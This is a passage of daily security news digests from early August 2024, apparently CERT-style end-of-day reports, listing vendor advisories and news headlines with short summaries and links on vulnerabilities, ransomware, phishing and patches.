∗∗∗ IBM Cloud Pak for Data is vulnerable to denial of service due to Rack ( CVE-2024-26146 ) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164274
∗∗∗ IBM Cloud Pak for Data is vulnerable to exposing sensitive information due to Masterminds GoUtils ( CVE-2021-4238 ) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164234
∗∗∗ IBM Cloud Pak for Data is vulnerable to denial of service due to Node.js semver ( CVE-2022-25883 ) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164266
∗∗∗ IBM Cloud Pak for Data is vulnerable to regular expression denial of service due to Rack ( CVE-2023-27539 ) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164269
∗∗∗ This Power System update is being released to address CVE-2024-41660 ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7163146
∗∗∗ IBM Aspera Shares improved security for user session handling (CVE-2023-38018) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164325
∗∗∗ The IBM Engineering Lifecycle Engineering product using the -Xgc:concurrentScavenge option on IBM Z is vulnerable to Buffer overflow in GC ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164658
∗∗∗ The IBM Engineering Lifecycle Engineering product using IBM WebSphere Application Server is vulnerable to cross-site scripting (CVE-2024-35153) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164651
∗∗∗ The IBM Engineering Lifecycle Engineering product using IBM WebSphere Application Server is vulnerable to remote code execution (CVE-2024-35154) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164649
∗∗∗ The IBM Engineering Lifecycle Engineering product using IBM WebSphere Application Server is vulnerable to identity spoofing (CVE-2024-37532) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164653
∗∗∗ IBM Sterling Connect:Direct Web Service is affected by Java JWT vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164709
∗∗∗ There is a vulnerability in commons-compress-1.21.jar used by IBM Maximo Manage application in IBM Maximo Application Suite (CVE-2024-25710, CVE-2024-26308) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164810
∗∗∗ There is a vulnerability in commons-compress-1.21.jar used by IBM Maximo Asset Management application (CVE-2024-25710, CVE-2024-26308) ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164809
∗∗∗ Maximo Application Suite - IBM WebSphere Application Server Liberty is vulnerable to CVE-2024-27268 used in IBM Maximo Application Suite - Monitor Component ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164814
∗∗∗ Maximo Application Suite - IBM WebSphere Application Server Liberty is vulnerable to CVE-2024-22354 used in IBM Maximo Application Suite - Monitor Component ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164813
∗∗∗ Maximo Application Suite - IBM WebSphere Application Server Liberty is vulnerable to CVE-2023-51775 a denial of service due to jose4j ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164812
∗∗∗ Maximo Application Suite - IBM WebSphere Application Server Liberty is vulnerable to multiple CVEs used in IBM Maximo Application Suite - Monitor Component ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7164811
∗∗∗ Multiple Vulnerabilities in XCC affect IBM Cloud Pak System ∗∗∗
---------------------------------------------
https://www.ibm.com/support/pages/node/7147906
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 07-08-2024 18:00 − Thursday 08-08-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ No patch in sight: phishing warning in Outlook can be hidden via e-mail ∗∗∗
---------------------------------------------
On top of that, a phishing e-mail in Outlook can also pretend to be encrypted or signed. For Microsoft, the issue currently has no priority.
---------------------------------------------
https://www.golem.de/news/kein-patch-in-sicht-phishing-warnung-in-outlook-l…
∗∗∗ Samsung boosts bug bounty to a cool million for cracks of the Knox Vault subsystem ∗∗∗
---------------------------------------------
Good luck, crackers: it's an isolated processor and storage enclave, and top dollar only comes from a remote attack. Samsung has dangled its first $1 million bug bounty for anyone who successfully compromises Knox Vault, the isolated subsystem the Korean giant bakes into its smartphones to store info like credentials and run authentication routines.
---------------------------------------------
https://www.theregister.com/2024/08/08/samsung_microsoft_big_bug_bounty/
∗∗∗ Using 1Password on Mac? Patch up if you don’t want your Vaults raided ∗∗∗
---------------------------------------------
Hundreds of thousands of users potentially vulnerable. Password manager 1Password is warning that all Mac users running versions before 8.10.36 are vulnerable to a bug that allows attackers to steal vault items.
---------------------------------------------
https://www.theregister.com/2024/08/08/using_1password_on_mac_patch/
∗∗∗ A Flaw in Windows Update Opens the Door to Zombie Exploits ∗∗∗
---------------------------------------------
A researcher found a vulnerability that would let hackers strategically downgrade a target’s Windows version to reexpose patched vulnerabilities. Microsoft is working on fixes for the issue.
---------------------------------------------
https://www.wired.com/story/windows-update-downdate-exploit/
∗∗∗ Vulnerabilities Exposed Widely Used Solar Power Systems to Hacking, Disruption ∗∗∗
---------------------------------------------
Vulnerabilities found in solar power systems could have been exploited by hackers to cause disruption and possibly blackouts.
---------------------------------------------
https://www.securityweek.com/vulnerabilities-exposed-widely-used-solar-powe…
∗∗∗ Royal Ransomware Actors Rebrand as “BlackSuit,” FBI and CISA Release Update to Advisory ∗∗∗
---------------------------------------------
Today, CISA—in partnership with the Federal Bureau of Investigation (FBI)—released an update to joint Cybersecurity Advisory #StopRansomware: Royal Ransomware, #StopRansomware: BlackSuit (Royal) Ransomware. The updated advisory provides network ..
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/08/07/royal-ransomware-actors-…
∗∗∗ US offers $10 million for info on Iranian leaders behind CyberAv3ngers water utility attacks ∗∗∗
---------------------------------------------
The U.S. State Department identified at least six Iranian government hackers allegedly responsible for a string of attacks on U.S. water utilities last fall and offered a large reward for information on their whereabouts.
---------------------------------------------
https://therecord.media/us-offers-reward-for-info-on-iranian-hackers-water-…
∗∗∗ BOTNET 7777: ARE YOU BETTING ON A COMPROMISED ROUTER? ∗∗∗
---------------------------------------------
A “7777 botnet” was first referenced in public reporting in October 2023 by Gi7w0rm. At the time, it was described as a botnet with approximately 10,000 nodes, observed primarily in brute-force attacks against Microsoft Azure instances. These attacks ..
---------------------------------------------
https://www.team-cymru.com/post/botnet-7777-are-you-betting-on-a-compromise…
∗∗∗ Go deeper: Linux runtime visibility meets Wireshark ∗∗∗
---------------------------------------------
Aqua Tracee is an open source runtime security and forensics tool for Linux, built to address common Linux security issues. Tracee’s main use case is to be installed in a production environment and continuously monitor system activity and detect suspicious behavior. Some alternative use cases which Tracee can be used for are dynamic malware analysis, system tracing, ..
---------------------------------------------
https://blog.aquasec.com/go-deeper-linux-runtime-visibility-meets-wireshark
∗∗∗ PureHVNC Deployed via Python Multi-stage Loader ∗∗∗
---------------------------------------------
FortiGuard Lab reveals a malware "PureHVNC", sold on the cybercrime forum, is spreading through a phishing campaign targeting employees via a python multi-stage loader
---------------------------------------------
https://www.fortinet.com/blog/threat-research/purehvnc-deployed-via-python-…
∗∗∗ Cisco: attackers can execute commands on IP phones, no update coming ∗∗∗
---------------------------------------------
There will be no updates for critical vulnerabilities in Cisco IP phones. A proof-of-concept exploit has surfaced for a recently reported vulnerability.
---------------------------------------------
https://heise.de/-9827988
=====================
= Vulnerabilities =
=====================
∗∗∗ DSA-5743-1 roundcube - security update ∗∗∗
---------------------------------------------
https://lists.debian.org/debian-security-announce/2024/msg00154.html
∗∗∗ Cisco Identity Services Engine Stored Cross-Site Scripting Vulnerabilities ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco Small Business SPA300 Series and SPA500 Series IP Phones Web UI Vulnerabilities ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 06-08-2024 18:00 − Wednesday 07-08-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Switzerland: cow dies after cyberattack on milking robot ∗∗∗
---------------------------------------------
The attackers demanded a ransom. Because the farmer did not want to pay, he was denied access to important information about his cows.
---------------------------------------------
https://www.golem.de/news/schweiz-kuh-stirbt-nach-cyberangriff-auf-melkrobo…
∗∗∗ New Linux Kernel Exploit Technique SLUBStick Discovered by Researchers ∗∗∗
---------------------------------------------
Cybersecurity researchers have shed light on a novel Linux kernel exploitation technique dubbed SLUBStick that could be exploited to elevate a limited heap vulnerability to an arbitrary memory read-and-write primitive. "Initially, it exploits ..
---------------------------------------------
https://thehackernews.com/2024/08/new-linux-kernel-exploit-technique.html
∗∗∗ Roundcube Webmail Flaws Allow Hackers to Steal Emails and Passwords ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed details of security flaws in the Roundcube webmail software that could be exploited to execute malicious JavaScript in a victim's web browser and steal sensitive information from their account under specific ..
---------------------------------------------
https://thehackernews.com/2024/08/roundcube-webmail-flaws-allow-hackers.html
∗∗∗ CrowdStrike hires outside security outfits to review troubled Falcon code ∗∗∗
---------------------------------------------
And reveals the small mistake that bricked 8.5M Windows boxes. CrowdStrike has hired two outside security firms to review its threat-detection suite Falcon that sparked a global IT outage last month - though it may not have an awful lot ..
---------------------------------------------
https://www.theregister.com/2024/08/07/crowdstrike_full_incident_root_cause…
∗∗∗ Police take just 2 days to recover $40M stolen in business email scam ∗∗∗
---------------------------------------------
Timor-Leste is a known cybercrime hotspot. Two days is all it took for Interpol to recover more than $40 million worth of stolen funds in a recent business email compromise (BEC) heist, the international cop shop said this week.
---------------------------------------------
https://www.theregister.com/2024/08/07/police_take_just_two_days/
∗∗∗ Small CSS tweaks can help nasty emails slip through Outlook's anti-phishing net ∗∗∗
---------------------------------------------
A simple HTML change and the warning is gone! Researchers say cybercriminals can have fun bypassing one of Microsoft's anti-phishing measures in Outlook with some simple CSS tweaks.
---------------------------------------------
https://www.theregister.com/2024/08/07/small_css_tweaks_can_help/
∗∗∗ BloodHound Operator — Dog Whispering Reloaded ∗∗∗
---------------------------------------------
Back in the BloodHound “Legacy” days, I wrote some PowerShell tooling to make my life easy and automate various tasks around BloodHound. When the new BloodHound came out, most of these tools ..
---------------------------------------------
https://posts.specterops.io/bloodhound-operator-dog-whispering-reloaded-156…
∗∗∗ CISA Releases Secure by Demand Guidance ∗∗∗
---------------------------------------------
Today, CISA and the Federal Bureau of Investigation (FBI) have released Secure by Demand Guide: How Software Customers Can Drive a Secure Technology Ecosystem to help organizations drive a secure technology ecosystem by ensuring their software manufacturers prioritize secure technology from the start. An organization's acquisition staff often has a general ..
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/08/06/cisa-releases-secure-dem…
∗∗∗ Attention: Microsoft's UEFI certificate expires on 19 Oct. 2026 – Secure Boot affected ∗∗∗
---------------------------------------------
[English] I am posting a topic here on the blog that still has "a few days' time" but could have rather unpleasant consequences. In autumn 2026 a certificate in Windows expires which, in UEFI, ensures that the ..
---------------------------------------------
https://www.borncity.com/blog/2024/08/07/achtung-microsofts-uefi-zertifikat…
∗∗∗ Looking back at the ballot – securing the general election ∗∗∗
---------------------------------------------
NCSC CEO Felicity Oswald shares reflections on keeping the 2024 General Election safe.
---------------------------------------------
https://www.ncsc.gov.uk/blog-post/looking-back-at-the-ballot-securing-the-g…
∗∗∗ The Risks of Parked Domains ∗∗∗
---------------------------------------------
Many organizations view parked domains as dormant, low-risk, and not worth the investment in robust security measures. This is a misconception. Here's why.
---------------------------------------------
https://www.bitsight.com/blog/risks-parked-domains
=====================
= Vulnerabilities =
=====================
∗∗∗ DSA-5739-1 wpa - security update ∗∗∗
---------------------------------------------
Rory McNamara reported a local privilege escalation in wpasupplicant: A user able to escalate to the netdev group can load arbitrary shared object files in the context of the wpa_supplicant process running as root.
---------------------------------------------
https://lists.debian.org/debian-security-announce/2024/msg00151.html
=====================
= End-of-Day report =
=====================
Timeframe: Monday 05-08-2024 18:00 − Tuesday 06-08-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Mac and Windows users infected by software updates delivered over hacked ISP ∗∗∗
---------------------------------------------
DNS poisoning attack worked even when targets used DNS from Google and Cloudflare.
---------------------------------------------
https://arstechnica.com/?p=2041175
∗∗∗ Microsoft Bounty Program Year in Review: $16.6M in Rewards ∗∗∗
---------------------------------------------
We are excited to announce that this year the Microsoft Bounty Program has awarded $16.6M in bounty awards to 343 security researchers from 55 countries, securing Microsoft customers in partnership with the Microsoft Security Response Center (MSRC). Each year we identify over a thousand potential security issues together, safeguarding our customers from possible threats through the Microsoft Bounty Program.
---------------------------------------------
https://msrc.microsoft.com/blog/2024/08/microsoft-bounty-program-year-in-re…
∗∗∗ A Survey of Scans for GeoServer Vulnerabilities ∗∗∗
---------------------------------------------
A little bit over a year ago, I wrote about scans for GeoServer. GeoServer is a platform to process geographic data. It makes it easy to share geospatial data in various common standard formats. Recently, new vulnerabilities were discovered in GeoServer, prompting me to look again at what our honeypots pick up.
---------------------------------------------
https://isc.sans.edu/diary/A+Survey+of+Scans+for+GeoServer+Vulnerabilities/…
∗∗∗ MDM vendor Mobile Guardian attacked, leading to remote wiping of 13,000 devices ∗∗∗
---------------------------------------------
Singapore Ministry of Education orders software removed after string of snafus. UK-based mobile device management vendor Mobile Guardian has admitted that on August 4 it suffered a security incident that involved unauthorized access to iOS and ChromeOS devices managed by its tools, which are currently unavailable. In Singapore, the incident resulted in ..
---------------------------------------------
https://www.theregister.com/2024/08/06/mobile_guardian_mdm_attack/
∗∗∗ Bad apps bypass Windows security alerts for six years using newly unveiled trick ∗∗∗
---------------------------------------------
Windows SmartScreen and Smart App Control both have weaknesses of which to be wary. Elastic Security Labs has lifted the lid on a slew of methods available to attackers who want to run malicious apps without triggering Windows security ..
---------------------------------------------
https://www.theregister.com/2024/08/06/bad_apps_bypass_windows_security/
∗∗∗ Olympics: Cybercriminals demand ransom after attack on museums in France ∗∗∗
---------------------------------------------
More than 40 institutions are affected, including the Olympic venue Grand Palais. Criminals attacked the system used to centralize financial data.
---------------------------------------------
https://www.derstandard.at/story/3000000231309/olympia-cyber-attacke-auf-mu…
∗∗∗ IoT firmware emulation and device fingerprinting challenges ∗∗∗
---------------------------------------------
Gathering information on a device could be tricky if you don’t have direct access to exposed services like SNMP, HTTP, FTP, or any other ports or protocols which could provide relevant information on the asset like the ..
---------------------------------------------
https://medium.com/tenable-techblog/iot-firmware-emulation-and-device-finge…
∗∗∗ Rapid7’s Ransomware Radar Report Shows Threat Actors are Evolving …Fast. ∗∗∗
---------------------------------------------
The Ransomware Radar Report offers some startling insights into who ransomware threat actors are and how they’ve been operating in the first half of 2024.
---------------------------------------------
https://www.rapid7.com/blog/post/2024/08/06/rapid7s-ransomware-radar-report…
∗∗∗ LKA Niedersachsen warns of phishing with QR codes sent by postal mail ∗∗∗
---------------------------------------------
Fraudsters are using postal mail to find victims who scan a QR code and fall for the phishing link it opens, warns the LKA Niedersachsen.
---------------------------------------------
https://heise.de/-9825879
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (libreoffice), Gentoo (containerd and firefox), Red Hat (httpd), SUSE (ca-certificates-mozilla, ksh, openssl-3-livepatches, podman, python-Twisted, and skopeo), and Ubuntu (imagemagick).
---------------------------------------------
https://lwn.net/Articles/984598/
∗∗∗ DSA-5737-1 libreoffice - security update ∗∗∗
---------------------------------------------
https://lists.debian.org/debian-security-announce/2024/msg00149.html
∗∗∗ DSA-5736-1 openjdk-11 - security update ∗∗∗
---------------------------------------------
https://lists.debian.org/debian-security-announce/2024/msg00148.html
∗∗∗ ZDI-24-1099: Apache OFBiz resolveURI Authentication Bypass Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1099/
∗∗∗ Security Vulnerabilities fixed in Firefox 129 ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/mfsa2024-33/
=====================
= End-of-Day report =
=====================
Timeframe: Friday 02-08-2024 18:00 − Monday 05-08-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ StormBamboo Compromises ISP to Abuse Insecure Software Update Mechanisms ∗∗∗
---------------------------------------------
StormBamboo successfully compromised an internet service provider (ISP) in order to poison DNS responses for target organizations. Insecure software update mechanisms were targeted to surreptitiously install malware on victim machines running macOS and Windows.
---------------------------------------------
https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abu…
∗∗∗ Google Chrome warns uBlock Origin may soon be disabled ∗∗∗
---------------------------------------------
Google Chrome is now encouraging uBlock Origin users who have updated to the latest version to switch to other ad blockers before Manifest v2 extensions are disabled.
---------------------------------------------
https://www.bleepingcomputer.com/news/google/google-chrome-warns-ublock-ori…
∗∗∗ Security Tips for Modern Web Administrators ∗∗∗
---------------------------------------------
By understanding and implementing key security practices, you can significantly reduce the risk of attacks and ensure a safe experience for your users. Let’s break down some essential tips and strategies to enhance your website’s security.
---------------------------------------------
https://blog.sucuri.net/2024/08/security-tips-for-modern-web-administrators…
∗∗∗ Google gamed into advertising a malicious version of Authenticator ∗∗∗
---------------------------------------------
Scammers have been using Google's own ad system to fool people into downloading a borked copy of the Chocolate Factory's Authenticator software. A team at security shop Malwarebytes spotted the adverts, which appear to come from a Google approved domain – and from a verified user – earlier this week.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/08/05/security_in_…
∗∗∗ New SLUBStick Attack Makes Linux Kernel Vulnerabilities More Dangerous ∗∗∗
---------------------------------------------
A team of researchers from the Graz University of Technology in Austria has published a paper on SLUBStick, a new Linux kernel exploitation technique that can make heap vulnerabilities more dangerous.
---------------------------------------------
https://www.securityweek.com/new-slubstick-attack-makes-linux-kernel-vulner…
∗∗∗ Homebrew audit reveals security vulnerabilities – the team has closed most of them ∗∗∗
---------------------------------------------
An extensive security audit found vulnerabilities in the code and the CI/CD processes of the Homebrew package manager. Many, but not all, have been fixed.
---------------------------------------------
https://heise.de/-9822824
=====================
= Vulnerabilities =
=====================
∗∗∗ Critical vulnerability threatens enterprise software Apache OFBiz ∗∗∗
---------------------------------------------
Attackers can attack systems running Apache OFBiz and execute their own code. A version hardened against this is available for download. [..] At present there is little information about the vulnerability (CVE-2024-38856). A Seclists post indicates that authentication errors can occur, allowing attackers to execute their own code.
---------------------------------------------
https://heise.de/-9824150
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (openjdk-11), Fedora (bind, bind-dyndb-ldap, chromium, ffmpeg, hostapd, trafficserver, and wpa_supplicant), and Ubuntu (curl and linux-oem-6.5).
---------------------------------------------
https://lwn.net/Articles/984552/
∗∗∗ Pimax Play and PiTool accept WebSocket connections from unintended endpoints ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN50850706/
∗∗∗ Helmholz: Multiple products are vulnerable to regreSSHion ∗∗∗
---------------------------------------------
https://certvde.com/de/advisories/VDE-2024-044/
∗∗∗ Red Lion Europe: Multiple products are vulnerable to regreSSHion ∗∗∗
---------------------------------------------
https://certvde.com/de/advisories/VDE-2024-042/
∗∗∗ RaspAP Security Update Advisory (CVE-2024-41637) ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/82193/
∗∗∗ OpenAM Security Update Advisory (CVE-2024-41667) ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/82194/
∗∗∗ GStreamer Product Security Update Advisory (CVE-2024-40897) ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/82196/
∗∗∗ Roundcube: Security updates 1.6.8 and 1.5.8 released ∗∗∗
---------------------------------------------
https://roundcube.net/news/2024/08/04/security-updates-1.6.8-and-1.5.8
∗∗∗ F5: K000140505: Apache HTTPD vulnerability CVE-2024-38473 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000140505